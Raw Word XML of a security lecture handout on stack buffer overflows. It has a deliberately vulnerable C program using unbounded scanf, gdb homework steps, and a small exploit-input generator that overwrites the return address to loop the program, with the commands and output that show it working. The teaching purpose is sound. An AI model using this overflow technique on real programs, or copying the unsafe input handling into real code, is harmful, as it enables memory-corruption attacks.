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5B8" w:rsidRDefault="00FE7BBC">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>Lecture 2: Flooding return address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="009A15B8"/>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>1. Buffer overflow example: f2.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>void  foo(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>char  id[5];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>printf("enter id\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>scanf("%s", id);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>printf("you entered %s \n", id);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>int main(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>foo();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>printf("program ends here\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="009A15B8"/>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>(Homework)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>1) When “foo” is called, the system pushes the return address for “foo” in the stack and jumps to “foo”. Use gdb to find out this return address and the stack location where this address is stored. Dump the contents of this stack location to confirm that the stack indeed has the return address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>2) Find out the starting address of “id[]”. Explain how you found it. How far is id[] from the return address location?</w:t>
      </w:r>
      <w:r w:rsidR="00733CDD">
        <w:t xml:space="preserve"> Draw a memory map that shows code area and stack area. the code area should show where is main function and where is foo function. The stack area should show where is the return address for "foo" and the location of id[].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>3) After you enter an ID at “enter id” prompt, dump the memory to confirm that the entered ID is stored correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t xml:space="preserve">4) Step through the program until you are at “ret” instruction. Do “ni” and confirm that the program returns to the return address </w:t>
      </w:r>
      <w:r w:rsidR="004468D6">
        <w:t xml:space="preserve">in main() </w:t>
      </w:r>
      <w:r>
        <w:t>correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>5) Rerun the debugger, and this time enter a long ID such that it changes the return address. Dump the memory starting from “id[]” up to the return address location to see the ch</w:t>
      </w:r>
      <w:r w:rsidR="004468D6">
        <w:t>anged return address. When the gdb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> executes “ret” instruction, where does it return?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t xml:space="preserve">6) Can you give an input such that the program asks "enter id" more than once? Remember you are not changing the program. You only give some strange input that would confuse the program. You will need to redirect the standard input in order to </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>provide numeric input as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r>
        <w:t>./f2 &lt; attack_inp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>The above command will make f2 read input from the file "attack_inp" instead of the keyboard (the standard input). When you debugging your code, use following gdb command to make gdb read input from a file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r>
        <w:t>(gdb)run &lt; attack-inp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>The program will keep asking "enter id" if the attack was successful as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t>enter id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t>you entered ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t>enter id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t>you entered .........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t>................</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>To produce attack-inp, write a program that displays hexadecimal numbers as below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="009A15B8"/>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>inp-write.c:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="009A15B8"/>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>int main(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC" w:rsidP="00513DAF">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
      </w:pPr>
      <w:r>
        <w:t>char buf[200];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t>// assume we need 17 bytes to reach return address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t>strcpy(buf,"abcdeabcdeabcdeab"); // 17 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// and we overwrite return address </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t>// with the address of foo (assume it was 0x08048444)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t>buf[17]=0x44;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t>buf[18]=0x84;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t>buf[19]=0x04;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t>buf[20]=0x08;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t>write(1, buf, 21); // write to file number 1 which is the screen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t>return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="009A15B8"/>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>$ gcc  -o  inp-write  inp-write.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>$ ./inp-write &gt; attack-inp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>Check if attack-inp has the right attack bytes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A15B8" w:rsidRDefault="00FE7BBC">
      <w:r>
        <w:t>$ xxd  attack-inp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00074B14" w:rsidRDefault="00074B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>..............</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00074B14" w:rsidRDefault="00074B14">
      <w:r>
        <w:t>And use this to attack f2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00074B14" w:rsidRDefault="00074B14">
      <w:r>
        <w:t>$ ./f2 &lt; attack-inp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00074B14" w:rsidRDefault="00074B14" w:rsidP="00074B14">
      <w:r>
        <w:t>enter id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00074B14" w:rsidRDefault="00074B14" w:rsidP="00074B14">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t>you entered ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00074B14" w:rsidRDefault="00074B14" w:rsidP="00074B14">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t>enter id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00074B14" w:rsidRDefault="00074B14" w:rsidP="00074B14">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t>you entered .........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00074B14" w:rsidRDefault="00074B14" w:rsidP="00074B14">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="바탕;Batang"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t>................</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00074B14" w:rsidRDefault="00074B14"/>
    <w:sectPr w:rsidR="00074B14">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1985" w:right="1701" w:bottom="1701" w:left="1701"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870" w:rsidRDefault="00491870" w:rsidP="00074B14">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00491870" w:rsidRDefault="00491870" w:rsidP="0007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바탕;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Unicode MS"/>
    <w:charset w:val="81"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E0000AFF" w:usb1="500078FF" w:usb2="00000021" w:usb3="00000000" w:csb0="000001BF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="한양신명조;궁서">
    <w:altName w:val="바탕"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="81"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="굴림;Gulim">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870" w:rsidRDefault="00491870" w:rsidP="00074B14">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00491870" w:rsidRDefault="00491870" w:rsidP="00074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15B8"/>
    <w:rsid w:val="00074B14"/>
    <w:rsid w:val="002C02D8"/>
    <w:rsid w:val="004133EA"/>
    <w:rsid w:val="004468D6"/>
    <w:rsid w:val="00491870"/>
    <w:rsid w:val="00513DAF"/>
    <w:rsid w:val="00733CDD"/>
    <w:rsid w:val="009A15B8"/>
    <w:rsid w:val="00C55738"/>
    <w:rsid w:val="00D90041"/>
    <w:rsid w:val="00FA710F"/>
    <w:rsid w:val="00FE7B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8EC8"/>
  <w15:docId w15:val="{B6E46A99-11B8-46DB-A162-1F0F4BC9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jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="바탕;Batang" w:eastAsia="바탕;Batang" w:hAnsi="바탕;Batang" w:cs="Times New Roman"/>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qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="바탕;Batang" w:hAnsi="바탕;Batang"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="바닥글 Char"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="바탕;Batang" w:hAnsi="바탕;Batang"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a4"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:eastAsia="바탕"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rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a7">
    <w:name w:val="색인"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Mangal"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="ko-KR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="ko-KR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aa">
    <w:name w:val="바탕글"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:autoSpaceDE/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="384" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="한양신명조;궁서" w:eastAsia="한양신명조;궁서" w:hAnsi="한양신명조;궁서" w:cs="굴림;Gulim"/>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3</Pages>
  <Words>457</Words>
  <Characters>2606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힘내자</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>김기창</cp:lastModifiedBy>
  <cp:revision>46</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-03-08T13:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-07T06:52:00Z</dcterms:modified>
  <dc:language>ko-KR</dc:language>
</cp:coreProperties>
</file>